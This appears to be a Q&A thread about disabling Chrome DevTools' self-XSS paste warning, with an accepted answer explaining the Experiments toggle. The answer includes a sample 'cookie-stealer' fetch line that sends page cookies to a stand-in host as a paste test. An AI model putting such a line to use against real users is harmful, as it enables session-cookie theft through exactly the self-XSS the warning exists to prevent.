# Disable paste protection in Chrome DevTools?

Tags: google-chrome, google-chrome-devtools, copy-paste

In recent versions of Google Chrome, I've encountered a highly frustrating issue where pasting into the developer console is **disabled**.
This is incredibly inconvenient as I rely on the developer console daily. I may have to consider switching browsers, which I'd rather not do.

Comment: Just confirm it once as described in the prompt and it won't be a problem anymore. You can also manually uncheck it in the Experiments section in devtools preferences.

Comment: Enter `paste` in the search box at the top and it'll show you the relevant experiment.

Answer (score 61, accepted):

#### What is it?

[Ostensibly, it's this experimental feature in DevTools](https://developer.chrome.com/blog/new-in-devtools-120#self-xss):

> If you are a new DevTools user and you attempt to paste code, the Sources panel now shows you the *Do you trust this code?* dialog and the Console now displays a similar warning. Paste only the code that you understand and have reviewed yourself. To paste, type "**allow pasting**" when prompted. Once pasting has been allowed once, the warning will never be shown again.

Apparently [this was proposed back in 2014](https://bugs.chromium.org/p/chromium/issues/detail?id=345205).

---

#### How do I turn it on/off?

Open DevTools > Settings (top-right corner) > Experiments > Toggle **Show warning about Self-XSS when pasting code**

[image]

....however in Chrome 120 (December 2023) I'm able to paste self-0wning code into the console with no warnings or messages, *curious*.

[image]

---

I'm curious if anyone else gets a message - try copying+pasting the below script.

```
fetch( 'https://example.com/cookie-stealer?' + document.cookies )
```

Comment: any option disable from process argument?

Comment: Thanks for answer. Not working in Private mode. Required type every time.

Comment: @Kosmos If it isn't working for you in Incognito mode, have you first disabled it in normal mode (and also fully restarted Chrome)?

Comment: @Dai, did you try to check your suggestion by yourself before advising?)

Comment: @MaksymKosenko Yes, of course - except in my case, I _never_ get the paste warning, whether or not the checkbox (in the Experiments page) is checked or not - ditto Incognito mode or not. Other people are noticing this too: there seems to be some kind of hidden-state for this feature which isn't exposed anywhere.

Comment: Hm, interesting, for me it does not work in Linux/MacOs/Win11

Comment: @Dai, Yes, I did it.

Comment: The reason you may not see this warning is because the warning [only fires once per Chrome profile](https://developer.chrome.com/blog/self-xss#is_that_a_one-time_setting), and [will only show up if you've run less than 5 prior commands in the console](https://developer.chrome.com/blog/self-xss#when_will_devtools_show_self-xss_warnings).